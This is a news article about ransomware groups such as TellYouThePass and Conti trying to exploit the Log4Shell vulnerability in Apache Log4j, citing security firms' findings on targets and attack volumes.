Log4Shell on ransomware gangs’ radar, exploit attempts detected in China, the US, Europe

Ransomware operators have intensified attempts to exploit Log4Shell (CVE-2021-44228), a critical vulnerability detected early this month in a widely used open-source logging software Apache Log4j. An old ransomware family called TellYouThePass that was inactive until a few days ago has been brought back to exploit this particular vulnerability, said researchers at cybersecurity firm Sophos and several others, VentureBeat reported.

The attempt to exploit Log4Shell by this particular ransomware family was first reported by the Chinese cybersecurity group KnowSec 404. Researchers at Sophos told VentureBeat that TellYouThePass has target systems in China and a few in the US and Europe that were hosted on AWS and Google Cloud services.  

TellYouThePass isn’t the only ransomware group that has sprung into action to take advantage of the opportunity. The far more notorious Conti ransomware group with Russian links has also made attempts to exploit Log4Shell. Researchers at New York-based cybersecurity firm AdvIntel said the Conti ransomware group has tried to exploit the vulnerability to access multiple targets including VMWare vCentre, a server management software. The security firm said that Conti used Cobalt Strike to target companies in the US and Europe. Cobalt Strike is a remote access tool that is also used to carry out targeted attacks. It is also used for penetration testing by ethical hackers.

Also read: India ranks 4 in Asia in ransomware attack detection rates: Report

The fact that the vulnerability is now on the radar of dangerous ransomware groups is a serious concern. The group is known to exploit an initial attack vector to breach corporate networks.  

According to AdvIntel, Conti is a very successful group and has raked in $150 million through its operations in the last six months.  

CheckPoint in its report had said that 46% of the initial attacks were made by known malicious actors. Microsoft also warned that the majority of attacks are being carried out for mass scanning and identifying vulnerable websites and applications. Many of the attackers were found to be affiliated with ransomware actors and nation state-backed threat groups, which indicates the motive behind the initial attack was only to gain access to vulnerable applications and sell it to the highest bidder afterwards. This can trigger a wave of ransomware attacks in 2022.  

Also read: Microsoft confirms that attackers exploited Log4Shell to deploy new ransomware

Log4j is embedded in every Java-based product or web service. Though Apache, the open-source web community, has already released two patches to fix it, security experts at CheckPoint warned that since patching is complex and the vulnerability is easy to exploit, it will continue to afflict organisations for several years.  

Within 72 hours after the detection of the vulnerability, cybersecurity firm CheckPoint had detected over 800,000 attempts to exploit it. They also found that 41% of corporate networks in India had been targeted. Log4Shell has been awarded the highest possible severity score of 10.